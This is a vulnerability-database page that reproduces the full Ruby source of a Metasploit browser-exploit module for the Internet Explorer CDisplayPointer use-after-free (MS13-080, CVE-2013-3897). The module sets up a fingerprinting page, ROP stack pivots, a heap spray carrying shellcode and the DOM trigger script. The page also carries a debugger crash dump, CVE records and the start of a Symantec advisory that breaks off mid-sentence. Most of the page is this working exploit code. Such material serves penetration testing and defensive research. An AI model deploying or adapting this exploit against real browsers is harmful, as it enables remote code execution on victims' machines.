MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free
2013-10-12T18:01:17
ID MSF:EXPLOIT/WINDOWS/BROWSER/MS13_080_CDISPLAYPOINTER Type metasploit Reporter Rapid7 Modified 2020-10-02T20:00:37
Description
This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, around the same time frame as CVE-2013-3893, except this was kept out of the public eye by multiple research companies and the vendor until the October patch release. This issue is a use-after-free vulnerability in CDisplayPointer via the use of a "onpropertychange" event handler. To set up the appropriate buggy conditions, we first craft the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. If we use a select() function for the CTextArea element, two important things will happen: a CDisplayPointer object will be created for CTextArea, and it will also trigger another event called "onselect". The "onselect" event will allow us to set up for the actual event handler we want to abuse - the "onpropertychange" event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in "onselect", this will trigger "onpropertychange". During "onpropertychange" event handling, a free of the CDisplayPointer object can be forced by using an "Unselect" (other approaches also apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because it is still trying to use that to update CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash finally occurs due to accessing the freed memory. By controlling this freed memory, it is possible to achieve arbitrary code execution under the context of the user.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "8.0",
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::Match::WINDOWS,
:rank => NormalRanking
})
def initialize(info={})
super(update_info(info,
'Name' => "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free",
'Description' => %q{
This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally
found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP,
around the same time frame as CVE-2013-3893, except this was kept out of the public eye by
multiple research companies and the vendor until the October patch release.
This issue is a use-after-free vulnerability in CDisplayPointer via the use of a
"onpropertychange" event handler. To set up the appropriate buggy conditions, we first craft
the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element.
If we use a select() function for the CTextArea element, two important things will happen:
a CDisplayPointer object will be created for CTextArea, and it will also trigger another
event called "onselect". The "onselect" event will allow us to set up for the actual event
handler we want to abuse - the "onpropertychange" event. Since the CBlockElement is a child
of CTextArea, if we do a node swap of CBlockElement in "onselect", this will trigger
"onpropertychange". During "onpropertychange" event handling, a free of the CDisplayPointer
object can be forced by using an "Unselect" (other approaches also apply), but a reference
of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after
the CDoc::GetLineInfo call, because it is still trying to use that to update
CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash
finally occurs due to accessing the freed memory. By controlling this freed memory, it is
possible to achieve arbitrary code execution under the context of the user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Exploit in the wild
'sinn3r' # Metasploit
],
'References' =>
[
[ 'CVE', '2013-3897' ],
[ 'OSVDB', '98207' ],
[ 'MSB', 'MS13-080' ],
[ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx' ],
[ 'URL', 'http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb' ]
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 7 on Windows XP SP3', {} ],
[ 'IE 8 on Windows XP SP3', {} ],
[ 'IE 8 on Windows 7', {} ],
],
'Payload' =>
{
'BadChars' => "\x00",
'PrependEncoder' => "\x81\xc4\x0c\xfe\xff\xff" # add esp, -500
},
'DefaultOptions' =>
{
#'PrependMigrate' => true,
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Privileged' => false,
# Jsunpack first received a sample to analyze on Sep 12 2013.
# MSFT patched this on Oct 8th.
'DisclosureDate' => '2013-10-08',
'DefaultTarget' => 0))
end
def get_check_html
%Q|<html>
<script>
#{js_base64}
#{js_os_detect}
function os() {
var detect = window.os_detect.getVersion();
var os_string = detect.os_name + " " + detect.ua_name + " " + detect.ua_version;
return os_string;
}
function dll() {
var checka = 0;
var checkb = 0;
try {
checka = new ActiveXObject("SharePoint.OpenDocuments.4");
} catch (e) {}
try {
checkb = new ActiveXObject("SharePoint.OpenDocuments.3");
} catch (e) {}
if ((typeof checka) == "object" && (typeof checkb) == "object") {
try{location.href='ms-help://'} catch(e){}
return "#{@js_office_2010_str}";
}
else if ((typeof checka) == "number" && (typeof checkb) == "object") {
try{location.href='ms-help://'} catch(e){}
return "#{@js_office_2007_str}";
}
return "#{@js_default_str}";
}
window.onload = function() {
window.location = "#{get_uri.chomp("/")}/search?o=" + escape(Base64.encode(os())) + "&d=" + dll();
}
</script>
</html>
|
end
def junk
rand_text_alpha(4).unpack("V")[0].to_i
end
def get_payload(target_info)
rop_payload = ''
os = target_info[:os]
dll_used = ''
case target_info[:dll]
when @js_office_2007_str
dll_used = "Office 2007"
pivot =
[
0x51c2213f, # xchg eax,esp # popad # add byte ptr [eax],al # retn 4
junk, # ESI due to POPAD
junk, # EBP due to POPAD
junk,
junk, # EBX due to POPAD
junk, # EDX due to POPAD
junk, # ECX due to POPAD
0x51c5d0a7, # EAX due to POPAD (must be writable for the add instruction)
0x51bd81db, # ROP NOP
junk # Padding for the retn 4 from the stack pivot
].pack("V*")
rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot})
when @js_office_2010_str
dll_used = "Office 2010"
pivot =
[
0x51c00e64, # xchg eax, esp; add eax, [eax]; add esp, 10; mov eax,esi; pop esi; pop ebp; retn 4
junk,
junk,
junk,
junk,
junk,
0x51BE7E9A, # ROP NOP
junk # Padding for the retn 4 from the stack pivot
].pack("V*")
rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot})
when @js_default_str
if target_info[:os] =~ /windows xp/i
# XP uses msvcrt.dll
dll_used = "msvcrt"
pivot =
[
0x77C3868A # xchg eax,esp; rcr [ebx-75], 0c1h; pop ebp; ret
].pack("V*")
rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot})
else
# Assuming this is Win 7, and we'll use Java 6 ROP
dll_used = "Java"
pivot =
[
0x7c342643, # xchg eax,esp # pop edi # add byte ptr [eax],al # pop ecx # retn
junk # Padding for the POP ECX
].pack("V*")
rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
end
end
print_status("Target uses #{os} with #{dll_used} DLL")
rop_payload
end
#
# IE 6's call is at 6
# IE 8's call is at 7
# Don't think this one triggers on IE9
#
def get_sploit_html(target_info)
os = target_info[:os]
js_payload = ''
if os =~ /Windows (7|XP) MSIE [78]\.0/
js_payload = Rex::Text.to_unescape(get_payload(target_info))
else
print_error("Target not supported by this attack.")
return ""
end
%Q|<html>
<head>
<script>
#{js_property_spray}
sprayHeap({shellcode:unescape("#{js_payload}")});
var earth = document;
var data = "";
for (i=0; i<17; i++) {
if (i==6) { data += unescape("%u2020%u2030"); }
else if (i==7) { data += unescape("%u2020%u2030"); }
else { data += unescape("%u4141%u4141"); }
}
data += "\\u4141";
function butterfly() {
for(i=0; i<20; i++) {
var effect = earth.createElement("div");
effect.className = data;
}
}
function kaiju() {
var godzilla = earth.createElement("textarea");
var minilla = earth.createElement("pre");
earth.body.appendChild(godzilla);
earth.body.appendChild(minilla);
godzilla.appendChild(minilla);
godzilla.onselect=function(e) {
minilla.swapNode(earth.createElement("div"));
}
var battleStation = false;
var war = new Array();
godzilla.onpropertychange=function(e) {
if (battleStation == true) {
for (i=0; i<50; i++) {
war.push(earth.createElement("span"));
}
}
earth.execCommand("Unselect");
if (battleStation == true) {
for (i=0; i < war.length; i++) {
war[i].className = data;
}
}
else {
battleStation = true;
}
}
butterfly();
godzilla.select();
}
</script>
</head>
<body onload='kaiju()'>
</body>
</html>
|
end
def on_request_uri(cli, request)
if request.uri =~ /search\?o=(.+)\&d=(.+)$/
target_info =
{
:os => Rex::Text.decode_base64(Rex::Text.uri_decode($1)),
:dll => Rex::Text.uri_decode($2)
}
sploit = get_sploit_html(target_info)
send_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
return
end
html = get_check_html
print_status("Checking out target...")
send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
end
def exploit
@js_office_2007_str = Rex::Text.rand_text_alpha(4)
@js_office_2010_str = Rex::Text.rand_text_alpha(5)
@js_default_str = Rex::Text.rand_text_alpha(6)
super
end
end
=begin
+hpa this for debugging or you might not see a crash at all :-)
0:005> r
eax=d6091326 ebx=0777efd4 ecx=00000578 edx=000000c8 esi=043bbfd0 edi=043bbf9c
eip=6d6dc123 esp=043bbf7c ebp=043bbfa0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!QIClassID+0x30:
6d6dc123 8b03 mov eax,dword ptr [ebx] ds:0023:0777efd4=????????
0:005> u
mshtml!QIClassID+0x30:
6d6dc123 8b03 mov eax,dword ptr [ebx]
6d6dc125 8365e800 and dword ptr [ebp-18h],0
6d6dc129 8d4de8 lea ecx,[ebp-18h]
6d6dc12c 51 push ecx
6d6dc12d 6870c16d6d push offset mshtml!IID_IProxyManager (6d6dc170)
6d6dc132 53 push ebx
6d6dc133 bf02400080 mov edi,80004002h
6d6dc138 ff10 call dword ptr [eax]
=end
{"id": "MSF:EXPLOIT/WINDOWS/BROWSER/MS13_080_CDISPLAYPOINTER", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, around the same time frame as CVE-2013-3893, except this was kept out of the public eye by multiple research companies and the vendor until the October patch release. This issue is a use-after-free vulnerability in CDisplayPointer via the use of a \"onpropertychange\" event handler. To set up the appropriate buggy conditions, we first craft the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. If we use a select() function for the CTextArea element, two important things will happen: a CDisplayPointer object will be created for CTextArea, and it will also trigger another event called \"onselect\". The \"onselect\" event will allow us to set up for the actual event handler we want to abuse - the \"onpropertychange\" event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in \"onselect\", this will trigger \"onpropertychange\". During \"onpropertychange\" event handling, a free of the CDisplayPointer object can be forced by using an \"Unselect\" (other approaches also apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because it is still trying to use that to update CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash finally occurs due to accessing the freed memory. By controlling this freed memory, it is possible to achieve arbitrary code execution under the context of the user.\n", "published": "2013-10-12T18:01:17", "modified": "2020-10-02T20:00:37", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3897", "http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx", "http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb"], "cvelist": ["CVE-2013-3893", "CVE-2013-3897"], "lastseen": "2020-10-12T22:22:11", "viewCount": 146, "enchantments": {"score": {"value": 9.7, "vector": "NONE", "modified": "2020-10-12T22:22:11", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-3897", "CVE-2013-3893"]}, {"type": "symantec", "idList": ["SMNTC-62811", "SMNTC-62453"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:123457", "PACKETSTORM:123603"]}, {"type": "seebug", "idList": ["SSV:82516", "SSV:61034"]}, {"type": "threatpost", "idList": ["THREATPOST:3BA8475F97E24074B27812B9B24AD05F", "THREATPOST:3D30F37EC2CC17D6C3D6882CF7F9777E", "THREATPOST:1699EFD514DA7A82DC9285D3892F61AE", "THREATPOST:B8B49658F96D885BA4DC80406A2A94B3", "THREATPOST:8F39618B0CB625A1C4FC439D0A7C4EB9", "THREATPOST:174CD32833BE921F59C5BEFC8DB73DBC"]}, {"type": "attackerkb", "idList": ["AKB:3C7B4CF8-80C4-45A5-9363-AFAA8C364D11", "AKB:38B15624-980B-45E2-BDE4-EE54BFBA9846"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MS13_080_CDISPLAYPOINTER/", "MSF:EXPLOIT/WINDOWS/BROWSER/IE_SETMOUSECAPTURE_UAF"]}, {"type": "thn", "idList": ["THN:1A9D68675814428FB1A1DD8C3778BCF1", "THN:652653D945C00F48ED829424A45D3937", "THN:D6BA201E74018A71C342FC55FFDD18A0", "THN:7ACF921BA3C582C8760C348FD2475BC2", "THN:7772BB7645946AB66D9B3F9358082C11"]}, {"type": "saint", "idList": ["SAINT:9C9DF567B343B95BFBDBFC93C3D86956", "SAINT:AA6CF686B616406A4115C9EBD9C6048C", "SAINT:04BD9122E7584A49B7BA167BCE00F13E", "SAINT:05AC159DEDA55280FEAA1BA681193C19", "SAINT:565085A4E9D605FF42D2E3C8CE2A1451", "SAINT:A85CFBC6927213488530ECDD18E63DF7"]}, {"type": "exploitdb", "idList": ["EDB-ID:28974", "EDB-ID:28682"]}, {"type": "jvn", "idList": ["JVN:27443259"]}, {"type": "zdt", "idList": ["1337DAY-ID-21380", "1337DAY-ID-21313"]}, {"type": "nessus", "idList": ["SMB_KB2887505.NASL", "SMB_NT_MS13-080.NASL"]}, {"type": "cisa", "idList": ["CISA:E8896EEDE5B9416FC85CCCAA2017E96A"]}, {"type": "canvas", "idList": ["IE_CDISPLAYPOINTER"]}, {"type": "mskb", "idList": ["KB2879017"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310804004"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13333"]}], "modified": "2020-10-12T22:22:11", "rev": 2}, "vulnersScore": 9.7}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => NormalRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally\n found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP,\n around the same time frame as CVE-2013-3893, except this was kept out of the public eye by\n multiple research companies and the vendor until the October patch release.\n\n This issue is a use-after-free vulnerability in CDisplayPointer via the use of a\n \"onpropertychange\" event handler. To set up the appropriate buggy conditions, we first craft\n the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element.\n If we use a select() function for the CTextArea element, two important things will happen:\n a CDisplayPointer object will be created for CTextArea, and it will also trigger another\n event called \"onselect\". The \"onselect\" event will allow us to set up for the actual event\n handler we want to abuse - the \"onpropertychange\" event. Since the CBlockElement is a child\n of CTextArea, if we do a node swap of CBlockElement in \"onselect\", this will trigger\n \"onpropertychange\". During \"onpropertychange\" event handling, a free of the CDisplayPointer\n object can be forced by using an \"Unselect\" (other approaches also apply), but a reference\n of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after\n the CDoc::GetLineInfo call, because it is still trying to use that to update\n CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash\n finally occurs due to accessing the freed memory. By controlling this freed memory, it is\n possible to achieve arbitrary code execution under the context of the user.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Exploit in the wild\n 'sinn3r' # Metasploit\n ],\n 'References' =>\n [\n [ 'CVE', '2013-3897' ],\n [ 'OSVDB', '98207' ],\n [ 'MSB', 'MS13-080' ],\n [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx' ],\n [ 'URL', 'http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb' ]\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 7 on Windows XP SP3', {} ],\n [ 'IE 8 on Windows XP SP3', {} ],\n [ 'IE 8 on Windows 7', {} ],\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'PrependEncoder' => \"\\x81\\xc4\\x0c\\xfe\\xff\\xff\" # add esp, -500\n },\n 'DefaultOptions' =>\n {\n #'PrependMigrate' => true,\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Privileged' => false,\n # Jsunpack first received a sample to analyze on Sep 12 2013.\n # MSFT patched this on Oct 8th.\n 'DisclosureDate' => '2013-10-08',\n 'DefaultTarget' => 0))\n end\n\n def get_check_html\n %Q|<html>\n<script>\n#{js_base64}\n#{js_os_detect}\n\nfunction os() {\n var detect = window.os_detect.getVersion();\n var os_string = detect.os_name + \" \" + detect.ua_name + \" \" + detect.ua_version;\n return os_string;\n}\n\nfunction dll() {\n var checka = 0;\n var checkb = 0;\n try {\n checka = new ActiveXObject(\"SharePoint.OpenDocuments.4\");\n } catch (e) {}\n\n try {\n checkb = new ActiveXObject(\"SharePoint.OpenDocuments.3\");\n } catch (e) {}\n\n if ((typeof checka) == \"object\" && (typeof checkb) == \"object\") {\n try{location.href='ms-help://'} catch(e){}\n return \"#{@js_office_2010_str}\";\n }\n else if ((typeof checka) == \"number\" && (typeof checkb) == \"object\") {\n try{location.href='ms-help://'} catch(e){}\n return \"#{@js_office_2007_str}\";\n }\n return \"#{@js_default_str}\";\n}\n\nwindow.onload = function() {\n window.location = \"#{get_uri.chomp(\"/\")}/search?o=\" + escape(Base64.encode(os())) + \"&d=\" + dll();\n}\n</script>\n</html>\n |\n end\n\n def junk\n rand_text_alpha(4).unpack(\"V\")[0].to_i\n end\n\n def get_payload(target_info)\n rop_payload = ''\n os = target_info[:os]\n dll_used = ''\n\n case target_info[:dll]\n when @js_office_2007_str\n dll_used = \"Office 2007\"\n\n pivot =\n [\n 0x51c2213f, # xchg eax,esp # popad # add byte ptr [eax],al # retn 4\n junk, # ESI due to POPAD\n junk, # EBP due to POPAD\n junk,\n junk, # EBX due to POPAD\n junk, # EDX due to POPAD\n junk, # ECX due to POPAD\n 0x51c5d0a7, # EAX due to POPAD (must be writable for the add instruction)\n 0x51bd81db, # ROP NOP\n junk # Padding for the retn 4 from the stack pivot\n ].pack(\"V*\")\n\n rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot})\n\n when @js_office_2010_str\n dll_used = \"Office 2010\"\n\n pivot =\n [\n 0x51c00e64, # xchg eax, esp; add eax, [eax]; add esp, 10; mov eax,esi; pop esi; pop ebp; retn 4\n junk,\n junk,\n junk,\n junk,\n junk,\n 0x51BE7E9A, # ROP NOP\n junk # Padding for the retn 4 from the stack pivot\n ].pack(\"V*\")\n\n rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot})\n\n when @js_default_str\n if target_info[:os] =~ /windows xp/i\n # XP uses msvcrt.dll\n dll_used = \"msvcrt\"\n\n pivot =\n [\n 0x77C3868A # xchg eax,esp; rcr [ebx-75], 0c1h; pop ebp; ret\n ].pack(\"V*\")\n\n rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot})\n else\n # Assuming this is Win 7, and we'll use Java 6 ROP\n dll_used = \"Java\"\n\n pivot =\n [\n 0x7c342643, # xchg eax,esp # pop edi # add byte ptr [eax],al # pop ecx # retn\n junk # Padding for the POP ECX\n ].pack(\"V*\")\n\n rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})\n end\n end\n\n print_status(\"Target uses #{os} with #{dll_used} DLL\")\n\n rop_payload\n end\n\n #\n # IE 6's call is at 6\n # IE 8's call is at 7\n # Don't think this one triggers on IE9\n #\n def get_sploit_html(target_info)\n os = target_info[:os]\n js_payload = ''\n\n if os =~ /Windows (7|XP) MSIE [78]\\.0/\n js_payload = Rex::Text.to_unescape(get_payload(target_info))\n else\n print_error(\"Target not supported by this attack.\")\n return \"\"\n end\n\n %Q|<html>\n<head>\n<script>\n#{js_property_spray}\nsprayHeap({shellcode:unescape(\"#{js_payload}\")});\n\nvar earth = document;\nvar data = \"\";\nfor (i=0; i<17; i++) {\n if (i==6) { data += unescape(\"%u2020%u2030\"); }\n else if (i==7) { data += unescape(\"%u2020%u2030\"); }\n else { data += unescape(\"%u4141%u4141\"); }\n}\ndata += \"\\\\u4141\";\n\nfunction butterfly() {\n for(i=0; i<20; i++) {\n var effect = earth.createElement(\"div\");\n effect.className = data;\n }\n}\n\nfunction kaiju() {\n var godzilla = earth.createElement(\"textarea\");\n var minilla = earth.createElement(\"pre\");\n earth.body.appendChild(godzilla);\n earth.body.appendChild(minilla);\n godzilla.appendChild(minilla);\n\n godzilla.onselect=function(e) {\n minilla.swapNode(earth.createElement(\"div\"));\n }\n\n var battleStation = false;\n var war = new Array();\n godzilla.onpropertychange=function(e) {\n if (battleStation == true) {\n for (i=0; i<50; i++) {\n war.push(earth.createElement(\"span\"));\n }\n }\n\n earth.execCommand(\"Unselect\");\n\n if (battleStation == true) {\n for (i=0; i < war.length; i++) {\n war[i].className = data;\n }\n }\n else {\n battleStation = true;\n }\n }\n\n butterfly();\n godzilla.select();\n}\n</script>\n</head>\n<body onload='kaiju()'>\n</body>\n</html>\n |\n end\n\n\n def on_request_uri(cli, request)\n if request.uri =~ /search\\?o=(.+)\\&d=(.+)$/\n target_info =\n {\n :os => Rex::Text.decode_base64(Rex::Text.uri_decode($1)),\n :dll => Rex::Text.uri_decode($2)\n }\n\n sploit = get_sploit_html(target_info)\n send_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\n return\n end\n\n html = get_check_html\n print_status(\"Checking out target...\")\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\n end\n\n def exploit\n @js_office_2007_str = Rex::Text.rand_text_alpha(4)\n @js_office_2010_str = Rex::Text.rand_text_alpha(5)\n @js_default_str = Rex::Text.rand_text_alpha(6)\n super\n end\nend\n\n\n=begin\n\n+hpa this for debugging or you might not see a crash at all :-)\n\n0:005> r\neax=d6091326 ebx=0777efd4 ecx=00000578 edx=000000c8 esi=043bbfd0 edi=043bbf9c\neip=6d6dc123 esp=043bbf7c ebp=043bbfa0 iopl=0 nv up ei pl zr na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\nmshtml!QIClassID+0x30:\n6d6dc123 8b03 mov eax,dword ptr [ebx] ds:0023:0777efd4=????????\n0:005> u\nmshtml!QIClassID+0x30:\n6d6dc123 8b03 mov eax,dword ptr [ebx]\n6d6dc125 8365e800 and dword ptr [ebp-18h],0\n6d6dc129 8d4de8 lea ecx,[ebp-18h]\n6d6dc12c 51 push ecx\n6d6dc12d 6870c16d6d push offset mshtml!IID_IProxyManager (6d6dc170)\n6d6dc132 53 push ebx\n6d6dc133 bf02400080 mov edi,80004002h\n6d6dc138 ff10 call dword ptr [eax]\n\n=end\n", "metasploitReliability": "", "metasploitHistory": ""}
{"cve": [{"lastseen": "2021-02-02T06:06:54", "description": "Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka \"Internet Explorer Memory Corruption Vulnerability.\"", "edition": 4, "cvss3": {}, "published": "2013-10-09T14:54:00", "title": "CVE-2013-3897", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-3897"], "modified": "2018-10-12T22:05:00", "cpe": ["cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:7", "cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:6"], "id": "CVE-2013-3897", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3897", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:release-preview:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:developer-preview:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:54", "description": "Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.", "edition": 4, "cvss3": {}, "published": "2013-09-18T10:08:00", "title": "CVE-2013-3893", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-3893"], "modified": "2018-10-12T22:05:00", "cpe": ["cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:7", "cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:6"], "id": "CVE-2013-3893", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3893", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:release-preview:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:developer-preview:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2018-03-12T04:24:48", "bulletinFamily": "software", "cvelist": ["CVE-2013-3897"], "description": "### Description\n\nMicrosoft Internet Explorer is prone to a memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions. Microsoft Internet Explorer 6, 7, 8, 9, 10, and 11 are affected.\n\n### Technologies Affected\n\n * Avaya Aura Conferencing Standard \n * Avaya CallPilot \n * Avaya Communication Server 1000 Telephony Manager \n * Avaya Meeting Exchange - Client Registration Server \n * Avaya Meeting Exchange - Recording Server \n * Avaya Meeting Exchange - Streaming Server \n * Avaya Meeting Exchange - Web Conferencing Server \n * Avaya Meeting Exchange - Webportal \n * Avaya Messaging Application Server \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should 